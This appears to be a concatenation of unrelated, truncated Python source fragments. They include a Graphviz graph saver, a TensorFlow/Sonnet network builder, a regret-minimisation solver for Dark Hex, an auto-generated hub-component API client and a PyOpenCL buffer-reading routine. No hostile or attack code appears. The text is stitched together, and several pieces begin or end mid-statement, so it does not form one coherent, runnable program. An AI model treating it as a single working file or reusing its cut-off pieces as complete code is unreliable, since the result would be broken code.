defined in 'prog', which defaults to 'dot'. """ flo.write( str(self) ) def save_xdot(self, flo, prog=None): prog = self.program if prog is None else prog flo.write( self.create(prog, "xdot") ) def save_png(self, flo, prog=None): prog = self.program if prog is None else prog flo.write( self.create(prog, "png") ) @classmethod def load_dot(cls, flo): parser = godot.dot_data_parser.GodotDataParser() return parser.parse_dot_file(flo) @classmethod def load_xdot(cls, flo): parser = godot.dot_data_parser.GodotDataParser() return parser.parse_dot_file(flo) def create(self, prog=None, format=None): """ Creates and returns a representation of the graph using the Graphviz layout program given by 'prog', according to the given format. Writes the graph to a temporary dot file and processes it with the program given by 'prog' (which defaults to 'dot'), reading the output and returning it as a string if the operation is successful. On failure None is returned. """ prog = self.program if prog is None else prog format = self.format if format
import tensorflow as tf from tensorflow_probability import distributions as tfd from .AbstractModule import AbstractModule from ..utils.argo_utils import load_sonnet_module class GeneralSonnetNetwork(AbstractModule): """Intermediate class to build a customizable Network (to be used as a building block from an ArgoNetwork) """ def __init__(self, activation, default_weights_init, default_bias_init, default_weights_reg, default_bias_reg, network_architecture, stochastic_defaults=None, network_str="", is_training=False, # seed=None, name='AbstractSonnetNetwork'): """Short summary. Args: activation (type): Description of parameter `activation`. default_weights_init (type): Description of parameter `default_weights_init`. default_bias_init (type): Description of parameter `default_bias_init`. default_weights_reg (type): Description of parameter `default_weights_reg`. default_bias_reg (type): Description of parameter `default_bias_reg`. network_architecture (list): a list of tuples (sntModule, kwargs, bool_activate). i.e. [(Linear, {"output_size": 100}, 1), (Linear, {"output_size": 10}, 1), ("GaussianDiagonal", {"size" : 20, "minimal_covariance" : 0}, 0)] stochastic_defaults (type): Description of parameter `stochastic_defaults`. network_str (str): Optional network_str specifying the network we are going to build. It is used to set some specific collections for activity and contractive regularizers. name (str): name of the Module. """ super().__init__(name=name) self._network_architecture = network_architecture self._network_str = network_str # self._is_training = is_training # self._seed = seed covariance_parameterization = None concentration_parameterization = None if stochastic_defaults: try: # what to do for multiple sampling layers, now I sample once! # self.n_z_samples = stochastic_defaults["samples"] if "covariance_parameterization" in stochastic_defaults: covariance_parameterization = stochastic_defaults["covariance_parameterization"] elif "concentration_parameterization" in stochastic_defaults: concentration_parameterization = stochastic_defaults["concentration_parameterization"] except KeyError as e: print("need to pass all the stochastic_defaults, missing keys") raise KeyError("need to pass all the stochastic_defaults, missing keys") from e # SET DEFAULTS FOR NETWORK CREATION # activation function self._activation = activation # SET DEFAULT PARAMETERS FOR SONNET MODULES # these are default parameters for the snt modules, "potentially" they could be overwritten # by the properties in the specific modules of "network_archicture" self._default_modules_kwargs = {} self._default_modules_kwargs['common'] = { "initializers": {}, "regularizers": {} } # "initializers" : {'w':default_weights_init, 'b':default_bias_init}, # "regularizers" : {'w':default_weights_reg, 'b':default_bias_reg} if default_weights_init: self._default_modules_kwargs['common']["initializers"]['w'] = default_weights_init if default_bias_init: self._default_modules_kwargs['common']["initializers"]['b'] = default_bias_init if default_weights_reg: self._default_modules_kwargs['common']["regularizers"]['w'] = default_weights_reg if default_bias_reg: self._default_modules_kwargs['common']["regularizers"]['b'] = default_bias_reg self._default_modules_kwargs['BatchFlatten'] = {} self._default_modules_kwargs['BatchReshape'] = {} self._default_modules_kwargs['Sigmoid'] = {} self._default_modules_kwargs['Tanh'] = {} self._default_modules_kwargs['Linear'] = { **self._default_modules_kwargs['common'] } self._default_modules_kwargs['Concatenate'] = { "node_name" : "y1h" } self._default_modules_kwargs['Identity'] = { } self._default_modules_kwargs['Conv2D'] = { **self._default_modules_kwargs['Linear'], "kernel_shape": (3, 3), "stride": (1, 1), "padding": 'SAME' } self._default_modules_kwargs['Conv2DTranspose'] = { **self._default_modules_kwargs['Linear'], "kernel_shape": (3, 3), "stride": (1, 1), "padding": 'SAME' } self._default_modules_kwargs['LinearWN'] = {**self._default_modules_kwargs['Linear'], "use_weight_norm": True } # setting default values for the initializers for WN self._default_modules_kwargs['LinearWN']["initializers"] = { 'v': tf.random_normal_initializer(0, 0.05), 'b': default_bias_init, 'g': default_bias_init } self._default_modules_kwargs['Conv2DWN'] = {**self._default_modules_kwargs['Conv2D'], "use_weight_norm": True} # setting default values for the initializers for WN self._default_modules_kwargs['Conv2DWN']["initializers"] = { 'v': tf.random_normal_initializer(0, 0.05), 'b': default_bias_init, 'g': default_bias_init } self._default_modules_kwargs['custom'] = {**self._default_modules_kwargs['common'], "activation": self._activation, "is_training": is_training} self._default_modules_kwargs['ResUnit'] = {**self._default_modules_kwargs['custom']} self._default_modules_kwargs['ResNet18'] = {**self._default_modules_kwargs['custom']} self._default_modules_kwargs['VGGBlock'] = {**self._default_modules_kwargs['custom']} self._default_modules_kwargs['ConvDec'] = {**self._default_modules_kwargs['custom']} self._default_modules_kwargs['ResEnc'] = {**self._default_modules_kwargs['custom']} self._default_modules_kwargs['ResDec'] = {**self._default_modules_kwargs['custom']} self._default_modules_kwargs['ConvNet2D'] = { **self._default_modules_kwargs['Linear'], "kernel_shapes": [(3, 3)], "strides": [2, 2], "paddings": 'SAME', "activation": self._activation, "activate_final": False, "normalize_final": False } self._default_modules_kwargs['ConvNet2DTranspose'] = { **self._default_modules_kwargs['ConvNet2D'] } self._default_modules_kwargs['MaxPooling2D'] = { "pool_size": (2, 2), "strides": 2 } self._default_modules_kwargs['RandomUniform'] = { "shape": 20, "minval": -1, "maxval": 1, } self._default_modules_kwargs['RandomGaussian'] = { "shape": 20 } self._default_modules_kwargs['AveragePooling2D'] = { "pool_size": (2, 2), "strides": 2 } self._default_modules_kwargs['Dropout'] = { # "seed" : self._seed, # "rate" : 0.5, "rate": 0.5, # tf.layers.dropout # "is_training" : self._is_training "dropout_flag": is_training } self._default_modules_kwargs['BatchNorm'] = { "is_training": is_training} self._default_modules_kwargs['GaussianDiagonal'] = { **self._default_modules_kwargs['common'], # TODO check the default value "minimal_covariance": 0., "covariance_parameterization": covariance_parameterization, # This wouls be desiderable, but at the moment it does not work # "module_tuple" : ("Linear", {}) } self._default_modules_kwargs['GaussianDiagonalZeroOne'] = { **self._default_modules_kwargs['GaussianDiagonal'], "module_tuple": ("Linear", {}) } self._default_modules_kwargs['GaussianDiagonalPlusMinusOne'] = { **self._default_modules_kwargs['GaussianDiagonal'], "module_tuple": ("Linear", {}) } self._default_modules_kwargs['Gaussian'] = { **self._default_modules_kwargs['common'], # TODO check the default value "minimal_covariance": 0., "covariance_parameterization": covariance_parameterization, # This wouls be desiderable, but at the moment it does not work # "module_tuple" : ("Linear", {}) } self._default_modules_kwargs['vonMisesFisher'] = { **self._default_modules_kwargs['common'], # TODO check the default value # see https://github.com/tensorflow/probability/blob/v0.9.0/tensorflow_probability/python/distributions/von_mises_fisher.py "minimal_concentration": 1, "concentration_parameterization": concentration_parameterization, # This wouls be desiderable, but at the moment it does not work # "module_tuple" : ("Linear", {}) } self._default_modules_kwargs['LogisticDiagonalZeroOne'] = { **self._default_modules_kwargs['GaussianDiagonalZeroOne'], } self._default_modules_kwargs['LogisticDiagonalPlusMinusOne'] = { **self._default_modules_kwargs['GaussianDiagonalPlusMinusOne'], } self._default_modules_kwargs['LogitNormalDiagonal'] = { **self._default_modules_kwargs['GaussianDiagonalZeroOne'], "clip_value": 0.0001 } self._default_modules_kwargs['LogitNormalDiagonalPlusMinusOne'] = { **self._default_modules_kwargs['GaussianDiagonalPlusMinusOne'], "clip_value": 0.0001 } self._default_modules_kwargs['Bernoulli'] = { **self._default_modules_kwargs['common'], "clip_value": 0.0001 } self._default_modules_kwargs['BernoulliPlusMinusOne'] = { **self._default_modules_kwargs['common'], "clip_value": 0.0001 } self._default_modules_kwargs['CIFAR10TutorialNetwork'] = { } # these are default parameters for the layers, "potentially" they could be overwritten # by the properties in the specific layers of "network_archicture" self._default_layers_kwargs = {} self._default_layers_kwargs['common'] = { "kernel_initializer": default_weights_init, "bias_initializer": default_bias_init, "kernel_regularizer": default_weights_reg, "bias_regularizer": default_bias_reg, } self._default_layers_kwargs['flatten'] = {} self._default_layers_kwargs['dense'] = { **self._default_layers_kwargs['common'], "activity_regularizer": None, "kernel_constraint": None, "bias_constraint": None } self._default_layers_kwargs['conv2d'] = { **self._default_layers_kwargs['dense'], # filters, # kernel_size, "strides": (1, 1), "padding": 'valid' # "data_format" : 'channels_last', # "dilation_rate" : (1, 1) } self._default_layers_kwargs['max_pooling2d'] = { "pool_size": (2, 2), "strides": 2 } self._default_layers_kwargs['batch_normalization'] = { } def _build(self, inputs): """Constructs the graph Args: inputs: `tf.Tensor` input to which to attach the network network_str: string used to separate collections of the network, i.e. used for activity and contractive regularizers Returns: if stochastic_architecture==None: `tf.Tensor` output with the decision of the discriminator else: tf.distribution """ print("Parsing " + self.module_name + " network...") net = inputs self._modules = [] self._layers = [] for i, module_tuple in enumerate(self._network_architecture): if isinstance(net, tfd.Distribution): # net = net.sample(self.n_z_samples) net = net.sample() if len(module_tuple) == 3: module_name, module_kwargs, bool_activation = module_tuple # no decorators decorators = [] elif len(module_tuple) == 4: module_name, module_kwargs, bool_activation, decorators = module_tuple # make a copy, so that I can pop safetely decorators = decorators.copy() else: raise Exception("The length of the module_tuple should be 3 or 4: " + str(module_tuple)) if module_name in self._default_modules_kwargs: kwargs = {**self._default_modules_kwargs[module_name], **module_kwargs } elif module_name in self._default_layers_kwargs: kwargs = {**self._default_layers_kwargs[module_name], **module_kwargs } else: raise Exception(module_name + " is neither a sonnet module nor a tf layer. Hint: check if you have set the self._default_modules_kwargs or self._default_layers_kwargs") # add reference for the contractive regularizers if needed, # this works for both StochaticLayers and also or regular layers + a ConstractiveRegularizer decorator self.add_reference_for_contractive_regularizers(kwargs, inputs) # load decorators decorator_modules = [] while len(decorators) > 0: decorator_name = decorators.pop(0) decorator = load_sonnet_module(decorator_name, kwargs) # (sntmodule) decorator_modules.append(decorator) # linear = decorator(args)(snt.Linear)(flat) if len(decorator_modules) > 0: # only load class of the moduke without instantiation sntmodule = load_sonnet_module(module_name, kwargs, instantiate=False) while len(decorator_modules) > 0: decorator = decorator_modules.pop(-1) sntmodule = decorator(sntmodule)(kwargs) # decorator(snt.Linear)(kwargs)(net) else: # no decorators, load the module sntmodule = load_sonnet_module(module_name, kwargs) # give the name feature to the last layer (after activation) last_node_before_logits = net net = sntmodule(net) self._modules.append(sntmodule) # at this point net is expected to be either a tensor (logits) or a tf.Distribution self._layers.append(net) if bool_activation: if isinstance(net, tfd.Distribution): raise Exception("cannot apply activation to a tf.Distribution, check network architecture!") net = self._activation(net) # name the last layer before logits (or distribution) last_node_before_logits = tf.identity(last_node_before_logits, name="features") # this will be either a tensor or a distribution output = net return output def add_reference_for_contractive_regularizers(self, kwargs, reference_node): if "contractive_regularizer" in kwargs and kwargs["contractive_regularizer"] is not None: reg_name, reg_kwargs = kwargs["contractive_regularizer"] kwargs["contractive_regularizer"] = (reg_name, reg_kwargs, reference_node, self._network_str) # #TODO-ARGO2 no need to have this as a separate function? GaussianModelLatentVars should be a Sonnet Module # #TODO-ARGO2 also: how do we plan on attaching several stochastic layers in the default way (one can always rewrite completely the network from scratch and i would say it is usually recommended.) ? # def _create_stochastic_layer(self, layer, stochastic_architecture, inputs, n_samples): # # NP: multiple layers not implented yet, in case you would need # # a loop over self.network_architecture["stochastic"] # assert(len(stochastic_architecture)==1) # # stochastic_model = None # layer_tuple = stochastic_architecture[0] # # layer_name, layer_kwargs = layer_tuple # # kwargs = { # **self._default_layers_kwargs["stochastic"], # **layer_kwargs, # "name" : "stochastic_layer" # } # # try: # # local import # # core_module = importlib.import_module("core") # # layer_path = layer_name+'.'+layer_name # # layer_class = load_method_fn_from_method_path(core_module, layer_path) # # #TODO-ARGO2 we NEED to put stochastic layers in areasonable place # layer_module = importlib.import_module("."+layer_name, '.'.join(__name__.split('.')[:-1])) # layer_class = load_method_fn_from_method_path(layer_module, layer_name) # # #TODO-ARGO2 having dictionary of parameters in the init or in a method is discouraged. # #TODO-ARGO2
<gh_stars>1-10 import numpy as np from Projects.base.util.print_tools import seq_to_str from Projects.base.game.darkHex import DarkHex from Projects.base.game.hex import Hex, pieces from tqdm import tqdm from copy import deepcopy, copy from collections import defaultdict import pickle class Node: def __init__(self, board, move_history, player, h, turn_num) -> None: self.player = player self.num_actions = len(board) self.move_history = move_history self.board = deepcopy(board) self.h = h self.turn_num = turn_num self.infoSet = get_infoset(self.board, self.h) self.strategy = np.zeros(self.num_actions) self.regretSum = np.zeros(self.num_actions) self.strategySum = np.zeros(self.num_actions) self.regrets = np.zeros(self.num_actions) self.T = 0 self.u = 0 self.pSum1 = 1 self.pSum2 = 1 self.visits = 1 self.pos_actions = [i for i, x in enumerate(self.board) if x == pieces.kEmpty] self.is_terminal = False self.children = [] self.parents = [] def getStrategy(self): normalizingSum = 0 for a in self.pos_actions: self.strategy[a] = max(self.regretSum[a], 0) # * regret matching algorithm here. # * just use the positive regrets. normalizingSum += self.strategy[a] # Add all the positive regrets -> normSum for a in self.pos_actions: if normalizingSum > 0: # if normalizing sum was positive all the action probs will # be devided by normSum self.strategy[a] /= normalizingSum else: # otherwise all actions are equaprobable (random) self.strategy[a] = 1.0 / len(self.pos_actions) self.strategySum[a] += self.strategy[a] * (self.pSum1 if \ self.player == pieces.kBlack else self.pSum2) # * summing up all the action probabilities # ? what is realizationWeight again return self.strategy def getAverageStrategy(self): normalizingSum = 0 for a in self.pos_actions: normalizingSum += self.strategySum[a] # summing up all the action probs using strategySum # ? why strategySum for a in self.pos_actions: if normalizingSum > 0: self.strategySum[a] /= normalizingSum else: self.strategySum[a] = 1 / len(self.pos_actions) return self.strategySum def update_infoset(self): self.infoSet = get_infoset(self.board, self.h) def __str__(self): return "{}:\t{}".format(self.infoSet, seq_to_str(self.getAverageStrategy(), spacing=' ')) class FSICFR: def __init__(self, num_rows=3, num_cols=3) -> None: self.num_rows = num_rows self.num_cols = num_cols self.num_actions = num_cols * num_rows self.nodes, self.nodes_dict = self.__init_board_topSorted() def train(self, num_of_iterations) -> None: for it in tqdm(range(num_of_iterations)): for node in self.nodes: # top-sorted nodes if node.visits == 0: node.visits = 1 node.pSum1 = 1 node.pSum2 = 1 rev_player = pieces.kBlack if node.player == pieces.kWhite else pieces.kWhite strategy = node.getStrategy() for a in node.pos_actions: # for each possible move # take action a on board children = [] # * update the board with action a and add the new # * board state to the -children- to traverse later. new_board = self.__placeStone(node.board, a, node.player) children.append(get_infoset(new_board, node.h)) if node.h > 0: new_board = self.__placeStone(node.board, a, rev_player) children.append(get_infoset(new_board, node.h-1)) for infoset_c in children: if infoset_c in self.nodes_dict: # update visits c = self.nodes_dict[infoset_c] c.visits += node.visits # update the rweights c.pSum1 += (strategy[a] * node.pSum1 if node.player == pieces.kBlack else node.pSum1) c.pSum2 += (strategy[a] * node.pSum2 if node.player == pieces.kWhite else node.pSum2) # endfor - pos_actions # endfor - nodes for node in self.nodes[::-1]: node.u = 0 strategy = node.getStrategy() rev_player = pieces.kBlack if node.player == pieces.kWhite else pieces.kWhite game = Hex(BOARD_SIZE=[self.num_rows, self.num_cols], BOARD=node.board, verbose=False) if game._game_status() == node.player: node.u = 1 elif game._game_status() != pieces.kDraw: node.u = -1 else: for a in range(self.num_actions): children = [] # * update the board with action a and add the new # * board state to the -children- to traverse later new_board = self.__placeStone(node.board, a, node.player) if not new_board: continue children.append(get_infoset(new_board, node.h)) if node.h > 0: new_board = self.__placeStone(node.board, a, rev_player) if not new_board: continue children.append(get_infoset(new_board, node.h-1)) for _, infoset_c in enumerate(children): if infoset_c in self.nodes_dict: if self.nodes_dict[infoset_c].player == node.player: childUtil = self.nodes_dict[infoset_c].u else: childUtil = - self.nodes_dict[infoset_c].u node.regrets[a] += childUtil node.u += strategy[a] * childUtil cfp = node.pSum2 if node.player == pieces.kBlack else node.pSum1 for a in node.pos_actions: nomin = (node.T * node.regretSum[a] + node.visits * cfp * (node.regrets[a] - node.u)) denom = node.T + node.visits node.regretSum[a] = nomin / denom node.T += node.visits node.visits = 0 node.pSum1 = 0 node.pSum2 = 0 # reset the strategysums - page 32 if it == num_of_iterations//2: for node in self.nodes: for a in range(len(node.strategySum)): node.strategySum[a] = 0 # for node in self.nodes: # if not node.is_terminal: # print(node.infoSet, node.getAverageStrategy()) def __init_board_topSorted(self) -> list: # TODO: Remove more states using pONE stack = []; nodes_dict = {}; visited = defaultdict(lambda: False) game = DarkHex([self.num_rows, self.num_cols], False) # create a root node for graph representation root = Node(game.BOARD, [], pieces.kBlack, 0, 0) self.__topSort_play(game, root.infoSet, '=', stack, visited, nodes_dict) print("Phase 1 has ended...") print("{} number of unique states".format(len(nodes_dict))) # topologically sort the nodes_dict using childrens of indexes top_sorted = self.top_sort(nodes_dict) return top_sorted, nodes_dict def top_sort(self, nodes_dict: dict): ''' Topologically sorting given dictionary based on child-parent relationship. Returns a list of nodes in topological order. ''' for node in nodes_dict: for child in nodes_dict[node].children: nodes_dict[child.infoSet].parents.append(node) # sort the nodes based on the parents sorted_nodes = sorted(nodes_dict.values(), key=lambda x: len(x.parents)) # reverse the list to get the top-sorted list nodes = sorted_nodes[::-1] # print nodes in order # for node in nodes: # print(node.infoSet) return nodes def __topSort_play(self, game, root_info, res, stack, visited, nodes_dict) -> None: # player = game.turn_info player = game.turn_information_func() # * Given a game, return the top-sorted full states # ------------------------------------------------- # -> Create the node for the current game&player # -> Player plays every possible action # -> Call the next game # -> Save the infoSet + node ext_infoSet = tuple([*game.BOARDS[pieces.kBlack], *game.BOARDS[pieces.kWhite]]) if res == pieces.kFail: node = Node(board=game.BOARDS[player], move_history=game.move_history[player], player=player, h=game.hidden_stones_count(player), turn_num=game.game_length) # ext_infoSet = get_infoset(node.board, node.h) if visited[ext_infoSet]: return else: visited[ext_infoSet] = True else: # * CREATING THE NODE ********* if res != pieces.kDraw: # If the game is over, switch player so # we get the ending players node player = res new_h = game.hidden_stones_count(player) node = Node(board=game.BOARDS[player], move_history=game.move_history[player], player=player, h=new_h, turn_num=game.game_length) node.is_terminal = res != pieces.kDraw # ******************************* if visited[ext_infoSet]: return else: visited[ext_infoSet] = True if node.is_terminal: if node.infoSet not in nodes_dict: nodes_dict[node.infoSet] = node stack.append(node) nodes_dict[root_info].children.append(node) # root.children.append(node) return valid_moves = copy(game.valid_moves_colors[player]) for a in valid_moves: _, res, _ = game.step(player, a) if node.infoSet not in nodes_dict: nodes_dict[node.infoSet] = node stack.append(node) if root_info != node.infoSet: nodes_dict[root_info].children.append(node) # root.children.append(node) self.__topSort_play(game, node.infoSet, res, stack, visited, nodes_dict) game.rewind(res == pieces.kFail) return def __placeStone(self, board, cell, color): ''' Placing a stone on the board and returning the new board Args: board: current board cell: cell to place the stone on color: color of the stone Returns: new board ''' new_board = deepcopy(board) # first check if the cell is empty # if not return False if new_board[cell] != pieces.kEmpty: return False if color == pieces.kBlack: north_connected = False south_connected = False if cell < self.num_cols: # First row north_connected = True elif cell >= self.num_cols * (self.num_rows - 1): # Last row south_connected = True for neighbour in self._cell_connections(cell): if new_board[neighbour] == pieces.kBlackNorth: north_connected = True elif new_board[neighbour] == pieces.kBlackSouth: south_connected = True if north_connected and south_connected: new_board[cell] = pieces.kBlackWin elif north_connected: new_board[cell] = pieces.kBlackNorth elif south_connected: new_board[cell] = pieces.kBlackSouth else: new_board[cell] = pieces.kBlack elif color == pieces.kWhite: east_connected = False west_connected = False if cell % self.num_cols == 0: # First column west_connected = True elif cell % self.num_cols == self.num_cols - 1: # Last column east_connected = True for neighbour in self._cell_connections(cell): if new_board[neighbour] == pieces.kWhiteWest: west_connected = True elif new_board[neighbour] == pieces.kWhiteEast: east_connected = True if east_connected and west_connected: new_board[cell] = pieces.kWhiteWin elif east_connected: new_board[cell] = pieces.kWhiteEast elif west_connected: new_board[cell] = pieces.kWhiteWest else: new_board[cell] = pieces.kWhite if new_board[cell] in [pieces.kBlackWin, pieces.kWhiteWin]: return new_board elif new_board[cell] not in [pieces.kBlack, pieces.kWhite]: # The cell is connected to an edge but not a win position. # We need to use flood-fill to find the connected edges. flood_stack = [cell] latest_cell = 0 while len(flood_stack) != 0: latest_cell = flood_stack.pop() for neighbour in self._cell_connections(latest_cell): if new_board[neighbour] == color: new_board[neighbour] = new_board[cell] flood_stack.append(neighbour) # Flood-fill is complete. return new_board def _cell_connections(self, cell): ''' Returns the neighbours of the
`create_component_version_stage`") # noqa: E501 # verify the required parameter 'name' is set if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501 local_var_params['name'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `name` when calling `create_component_version_stage`") # noqa: E501 # verify the required parameter 'body' is set if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501 local_var_params['body'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `body` when calling `create_component_version_stage`") # noqa: E501 collection_formats = {} path_params = {} if 'owner' in local_var_params: path_params['owner'] = local_var_params['owner'] # noqa: E501 if 'entity' in local_var_params: path_params['entity'] = local_var_params['entity'] # noqa: E501 if 'name' in local_var_params: path_params['name'] = local_var_params['name'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKey'] # noqa: E501 return self.api_client.call_api( '/api/v1/{owner}/hub/{entity}/versions/{name}/stages', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='V1Stage', # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats) def delete_component_hub(self, owner, name, **kwargs): # noqa: E501 """Delete hub component # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_component_hub(owner, name, async_req=True) >>> result = thread.get() :param async_req bool: execute request asynchronously :param str owner: Owner of the namespace (required) :param str name: Component under namesapce (required) :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True return self.delete_component_hub_with_http_info(owner, name, **kwargs) # noqa: E501 def delete_component_hub_with_http_info(self, owner, name, **kwargs): # noqa: E501 """Delete hub component # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_component_hub_with_http_info(owner, name, async_req=True) >>> result = thread.get() :param async_req bool: execute request asynchronously :param str owner: Owner of the namespace (required) :param str name: Component under namesapce (required) :param _return_http_data_only: response data without head status code and headers :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: None If the method is called asynchronously, returns the request thread. """ local_var_params = locals() all_params = [ 'owner', 'name' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method delete_component_hub" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'owner' is set if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501 local_var_params['owner'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `owner` when calling `delete_component_hub`") # noqa: E501 # verify the required parameter 'name' is set if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501 local_var_params['name'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `name` when calling `delete_component_hub`") # noqa: E501 collection_formats = {} path_params = {} if 'owner' in local_var_params: path_params['owner'] = local_var_params['owner'] # noqa: E501 if 'name' in local_var_params: path_params['name'] = local_var_params['name'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKey'] # noqa: E501 return self.api_client.call_api( '/api/v1/{owner}/hub/{name}', 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats) def delete_component_version(self, owner, entity, name, **kwargs): # noqa: E501 """Delete component version # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_component_version(owner, entity, name, async_req=True) >>> result = thread.get() :param async_req bool: execute request asynchronously :param str owner: Owner of the namespace (required) :param str entity: Entity: project name, hub name, registry name, ... (required) :param str name: Sub-entity name (required) :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True return self.delete_component_version_with_http_info(owner, entity, name, **kwargs) # noqa: E501 def delete_component_version_with_http_info(self, owner, entity, name, **kwargs): # noqa: E501 """Delete component version # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_component_version_with_http_info(owner, entity, name, async_req=True) >>> result = thread.get() :param async_req bool: execute request asynchronously :param str owner: Owner of the namespace (required) :param str entity: Entity: project name, hub name, registry name, ... (required) :param str name: Sub-entity name (required) :param _return_http_data_only: response data without head status code and headers :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: None If the method is called asynchronously, returns the request thread. """ local_var_params = locals() all_params = [ 'owner', 'entity', 'name' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method delete_component_version" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'owner' is set if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501 local_var_params['owner'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `owner` when calling `delete_component_version`") # noqa: E501 # verify the required parameter 'entity' is set if self.api_client.client_side_validation and ('entity' not in local_var_params or # noqa: E501 local_var_params['entity'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `entity` when calling `delete_component_version`") # noqa: E501 # verify the required parameter 'name' is set if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501 local_var_params['name'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `name` when calling `delete_component_version`") # noqa: E501 collection_formats = {} path_params = {} if 'owner' in local_var_params: path_params['owner'] = local_var_params['owner'] # noqa: E501 if 'entity' in local_var_params: path_params['entity'] = local_var_params['entity'] # noqa: E501 if 'name' in local_var_params: path_params['name'] = local_var_params['name'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKey'] # noqa: E501 return self.api_client.call_api( '/api/v1/{owner}/hub/{entity}/versions/{name}', 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats) def get_component_hub(self, owner, name, **kwargs): # noqa: E501 """Get hub component # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_component_hub(owner, name, async_req=True) >>> result = thread.get() :param async_req bool: execute request asynchronously :param str owner: Owner of the namespace (required) :param str name: Component under namesapce (required) :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding
queue: OpenCL Command Queue :type queue: pyopencl.CommandQueue :param q_id: Framework specific id assigned to Command Queue :type q_id: Integer :param obj: OpenCL Device Type :type obj: String :param size_percent: Percentage of problem space to be processed :type size_percent: Integer :param offset_percent: Percentage for offset required for selection of host array space to be copied to buffer :type offset_percent: Integer :param deps: PyOpenCL Event on which subsequent ndrange operations will be dependent on stored in a list :type deps: list of pyopencl.Event Objects :param callback: Custom callback function :type callback: python function :param kwargs: :type kwargs: :return: Barrier Event signifying end of read operation :rtype: pyopencl.event """ oev, ioev = [None] * len(self.output_buffers[obj]), [None] * len(self.io_buffers[obj]) logging.debug("PARTITION : Enqueuing Read Buffers %s",obj) depends = [None] * (len(self.output_buffers[obj]) + len(self.io_buffers[obj])) if len(depends) == 0: depends = [None] if deps: depends[0] = deps kwargs['host_event'].read_start = time.time() for i in range(len(self.output_buffers[obj])): if self.buffer_info['output'][i]['enq_read']: eo, ne = self.get_slice_values(self.buffer_info['output'][i], size_percent, offset_percent, **kwargs) logging.debug("PARTITION_%s : %s Enqueue_Read_Output_Buffers_element_offset : %s", obj, self.name, eo) logging.debug("PARTITION_%s : %s Enqueue_Read_Output_Buffers_number_of_elements : %s", obj, self.name, ne) oev[i] = 